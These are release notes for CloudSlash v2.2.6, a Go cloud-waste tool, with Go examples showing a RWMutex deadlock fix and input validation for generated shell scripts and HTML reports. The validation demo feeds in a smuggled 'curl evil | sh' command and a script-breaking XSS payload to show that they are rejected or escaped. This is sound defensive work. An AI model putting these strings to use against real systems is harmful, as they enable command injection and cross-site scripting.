v2.2.6

@github-actions github-actions released this 03 Feb 12:07

CloudSlash v2.2 Major Update Released

Feature & Stability Release

Overview

CloudSlash v2.2 marks the transition from a standalone CLI tool to a modular infrastructure governance platform. This release prioritizes architectural decoupling, state verification hardening, and integration capabilities for enterprise pipelines.

Key changes include the migration of the core engine to a reusable Go SDK, the introduction of a CEL-based policy engine, and strict "Zero-Drift" verification for the Lazarus Protocol.


New Features

Architecture & SDK

  • Core SDK Decoupling: Migrated internal logic to pkg/engine. CloudSlash now functions as a portable Go library, allowing direct integration into internal provider tools, developer portals (e.g., Backstage), and custom agents. The CLI is now a lightweight consumer of this SDK.
  • Simulation Engine (MockFactory): To build trust in automated decision-making, we have exposed the internal pkg/graph/MockFactory. Users can now programmatically construct hypothetical infrastructure scenarios (e.g., "What if I have 100 detached EBS volumes?") and run the CloudSlash heuristics against them in unit tests, verifying the "Kill Logic" before running it in production.
  • Real-Time Telemetry: Integrated CloudWatch metrics directly into the TUI. Resource details now display 7-day sparklines for CPU and Network utilization so that idle status can be validated empirically before remediation.

Stability & Verification (Updated v2.2.6)

Important: Critical Fixes in v2.2.6. This release resolves Reader-Writer priority inversion deadlocks that affected high-concurrency scans. Users on v2.2.0-v2.2.5 are strongly urged to upgrade.

  • Deadlock Resolution (v2.2.4, v2.2.6):

    • Fixed a Priority Inversion Deadlock where heuristics re-entrantly acquired Read Locks (RLock) while a Write Lock (Lock) was pending. Go's sync.RWMutex does not permit recursive read locking: once a writer has called Lock, new RLock calls block until that writer has been served, so a heuristic that re-locked while already holding the lock waited on the writer while the writer waited on it.
    • Re-architected heuristic data access to use direct store reads (g.Store.GetAllNodes) within critical sections, preventing the engine from freezing during mock and live scans.
    • Components fixed: AgedAMIHeuristic, ElasticIPHeuristic, UnattachedVolumeHeuristic, GhostNodeGroupHeuristic.
    • Distribution: Finalized documentation and release artifacts.
  • CI Artifact Reliability (v2.2.5):

    • Fixed an issue where CI pipelines checking for report.html would fail mock scans. The pipeline now deterministically generates all required artifacts.
  • Lazarus Protocol Hardening: Updated the restoration engine ("Undo" logic) to use Terraform-native verification. Post-restore validation now requires terraform plan to exit 0 before the restore is reported as drift-free. Note that a plain terraform plan exits 0 whenever it completes successfully, whether or not it proposes changes; only terraform plan -detailed-exitcode distinguishes the two cases (0 = no changes, 2 = changes pending), so the exit-code assertion is a zero-drift check only when plan is run in that mode.

  • Environment Enforcement: Added runtime checks to enforce execution within POSIX-compliant environments (Linux, macOS, WSL2), preventing undefined behavior on unsupported Windows shells.
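The recursive read-lock deadlock described above, reproduced and then fixed in a self-contained Go program. This is an added example written for these notes, not CloudSlash code: the Graph type, the buggyHeuristic and fixedHeuristic functions and the allNodesLocked store read are constructed stand-ins for the engine's graph, its heuristics and the g.Store.GetAllNodes direct read. It also shows the check a CI pipeline can keep: run a heuristic against a concurrent writer under a timeout, since neither the compiler nor the race detector reports this class of deadlock.

```go
package main

import (
	"fmt"
	"sync"
	"time"
)

// Graph is a constructed stand-in for an RWMutex-guarded resource graph; it is
// not CloudSlash's type. The nodes map plays the role of the store.
type Graph struct {
	mu    sync.RWMutex
	nodes map[string]string
}

func NewGraph() *Graph {
	return &Graph{nodes: map[string]string{"vol-0a1": "ebs-volume", "eip-0b2": "elastic-ip"}}
}

// AllNodes takes its own read lock, so it is only safe to call from code that
// does NOT already hold g.mu. sync.RWMutex forbids recursive read locking: once
// a writer has called Lock, new RLock calls block until that writer is served.
func (g *Graph) AllNodes() []string {
	g.mu.RLock()
	defer g.mu.RUnlock()
	return g.allNodesLocked()
}

// allNodesLocked reads the store directly; the caller must already hold g.mu
// (read or write). This is the "direct store read inside the critical section"
// pattern, under a hypothetical name.
func (g *Graph) allNodesLocked() []string {
	out := make([]string, 0, len(g.nodes))
	for id := range g.nodes {
		out = append(out, id)
	}
	return out
}

// buggyHeuristic reproduces the v2.2.0-v2.2.5 defect: it holds a read lock and
// then calls AllNodes, which tries to acquire a second read lock.
func (g *Graph) buggyHeuristic(holdingLock chan<- struct{}) int {
	g.mu.RLock()
	defer g.mu.RUnlock()
	holdingLock <- struct{}{}          // tell the harness the read lock is held
	time.Sleep(200 * time.Millisecond) // give a writer time to queue behind us
	return len(g.AllNodes())           // re-entrant RLock: blocks forever if a writer is waiting
}

// fixedHeuristic does the same work but reads the store directly under the
// single read lock it already owns.
func (g *Graph) fixedHeuristic(holdingLock chan<- struct{}) int {
	g.mu.RLock()
	defer g.mu.RUnlock()
	holdingLock <- struct{}{}
	time.Sleep(200 * time.Millisecond)
	return len(g.allNodesLocked())
}

// runScan runs one heuristic concurrently with a writer that inserts a node.
// It returns true if both finish before timeout and false if they deadlock.
func runScan(fixed bool, timeout time.Duration) bool {
	g := NewGraph()
	holdingLock := make(chan struct{})
	done := make(chan struct{}, 2)

	go func() {
		if fixed {
			g.fixedHeuristic(holdingLock)
		} else {
			g.buggyHeuristic(holdingLock)
		}
		done <- struct{}{}
	}()

	<-holdingLock // the heuristic now holds RLock
	go func() {
		g.mu.Lock() // writer queues; every subsequent RLock now waits for it
		g.nodes["sg-0c3"] = "security-group"
		g.mu.Unlock()
		done <- struct{}{}
	}()

	deadline := time.After(timeout)
	for i := 0; i < 2; i++ {
		select {
		case <-done:
		case <-deadline:
			return false // heuristic waits on writer, writer waits on heuristic
		}
	}
	return true
}

func main() {
	fmt.Println("buggy heuristic finished:", runScan(false, 2*time.Second))
	fmt.Println("fixed heuristic finished:", runScan(true, 2*time.Second))
}
```

The buggy run leaves two goroutines blocked forever and returns false at the deadline; the fixed run returns true well inside it. In a real test suite the timeout assertion is what turns this from an intermittent hang under load into a deterministic failure.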

Governance & Performance

  • CEL Policy Engine: Replaced static heuristics with a dynamic Common Expression Language (CEL) engine. Users can now define custom waste policies via YAML configuration (e.g., resource.cost > 500 && resource.tag['Env'] == 'Dev').
  • Local Pricing Cache: Implemented a persistent local cache for AWS Pricing API data with a 15-day TTL. This eliminates redundant network calls, reducing subsequent scan times to sub-second latency.

Operational Safety

  • Automated Rollback Generation: Remediation operations now generate a paired undo_cleanup.sh script. This artifact contains the precise commands to reverse specific actions, such as re-attaching Elastic IPs or re-provisioning Security Groups.
  • CI/CD "Strict Mode": Introduced the --strict flag. This forces the CLI to return a non-zero exit code (2) upon detecting partial API failures or policy violations, enabling "Fail-Closed" behavior for compliance pipelines.

Security Improvements

  • XSS Mitigation: Hardened HTML reporting engine. Resource IDs and chart data are now strictly marshaled via encoding/json (which escapes <, > and & as \u003c, \u003e and \u0026) before being embedded in the report's script block, preventing Cross-Site Scripting vectors.
  • Injection Defense: Implemented strict regex allow-listing (^[a-zA-Z0-9._/-]+$) for all inputs used in shell script generation to prevent command injection.
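An added example, not the project's code, covering both items above: the allow-list regex applied to every value that reaches the generated undo script, and encoding/json used to place resource IDs into the report's script block. UndoAction, validateArg, RenderUndoScript and EmbedReportData are hypothetical names; the aws ec2 commands are real CLI syntax, but the shape of the generated script is this example's, not CloudSlash's. Two caveats a reviewer would add are built in: the character class admits a leading '-', so a value such as --instance-id passes the regex yet would be parsed as an option, and json.Marshal's HTML escaping protects only the JavaScript context, not HTML attributes or body text.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// idPattern is the allow-list quoted in the release notes.
var idPattern = regexp.MustCompile(`^[a-zA-Z0-9._/-]+$`)

// UndoAction is a constructed stand-in for one remediation that undo_cleanup.sh
// must reverse; it is not CloudSlash's type.
type UndoAction struct {
	Kind     string // "associate-address" (Elastic IP) or "attach-volume" (EBS)
	ID       string // eipalloc-... or vol-...
	Instance string // i-...
	Device   string // block device for attach-volume, e.g. /dev/sdf
}

// validateArg applies the allow-list and additionally rejects a leading '-',
// which the character class permits but which a CLI would parse as an option.
func validateArg(s string) error {
	if !idPattern.MatchString(s) {
		return fmt.Errorf("%q contains characters outside [a-zA-Z0-9._/-]", s)
	}
	if strings.HasPrefix(s, "-") {
		return fmt.Errorf("%q starts with '-' and could be parsed as a flag", s)
	}
	return nil
}

// q single-quotes a value for POSIX sh. The allow-list excludes the quote
// character itself, so nothing inside the quotes needs escaping.
func q(s string) string { return "'" + s + "'" }

// RenderUndoScript emits undo_cleanup.sh from validated actions only.
func RenderUndoScript(actions []UndoAction) (string, error) {
	var b strings.Builder
	b.WriteString("#!/bin/sh\nset -eu\n")
	for _, a := range actions {
		for _, v := range []string{a.ID, a.Instance} {
			if err := validateArg(v); err != nil {
				return "", err
			}
		}
		switch a.Kind {
		case "associate-address":
			fmt.Fprintf(&b, "aws ec2 associate-address --allocation-id %s --instance-id %s\n", q(a.ID), q(a.Instance))
		case "attach-volume":
			if err := validateArg(a.Device); err != nil {
				return "", err
			}
			fmt.Fprintf(&b, "aws ec2 attach-volume --volume-id %s --instance-id %s --device %s\n", q(a.ID), q(a.Instance), q(a.Device))
		default:
			return "", fmt.Errorf("unknown undo action kind %q", a.Kind)
		}
	}
	return b.String(), nil
}

// EmbedReportData serialises resource IDs for the report's <script> block.
// json.Marshal escapes '<', '>' and '&' as \u003c, \u003e and \u0026 by default,
// so a hostile ID cannot close the script element. This is only safe inside a
// JavaScript context; HTML body text still needs html/template.
func EmbedReportData(ids []string) (string, error) {
	data, err := json.Marshal(ids)
	if err != nil {
		return "", err
	}
	return "<script>const resourceIds = " + string(data) + ";</script>", nil
}

func main() {
	script, _ := RenderUndoScript([]UndoAction{
		{Kind: "attach-volume", ID: "vol-0123abcd", Instance: "i-0fedcba9", Device: "/dev/sdf"},
	})
	fmt.Print(script)
	_, err := RenderUndoScript([]UndoAction{
		{Kind: "associate-address", ID: "eipalloc-1; curl evil | sh", Instance: "i-0fedcba9"},
	})
	fmt.Println("injection attempt rejected:", err)
	page, _ := EmbedReportData([]string{"vol-1", "</script><img src=x onerror=alert(1)>"})
	fmt.Println(page)
}
```

The constructed inputs show the three outcomes: a well-formed volume reattachment renders with every value single-quoted, a value carrying shell metacharacters is refused before any script text is written, and an ID containing a closing script tag reaches the report only as \u003c/script\u003e.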

Distribution & UX

  • Homebrew Support: Official Homebrew tap is now available.
    brew install drskyle/tap/cloudslash
  • Sudo-Aware Updates: Resolved issues where cloudslash update hung on interactive password prompts when writing to protected directories (/usr/local/bin).

Repository: https://github.com/DrSkyle/CloudSlash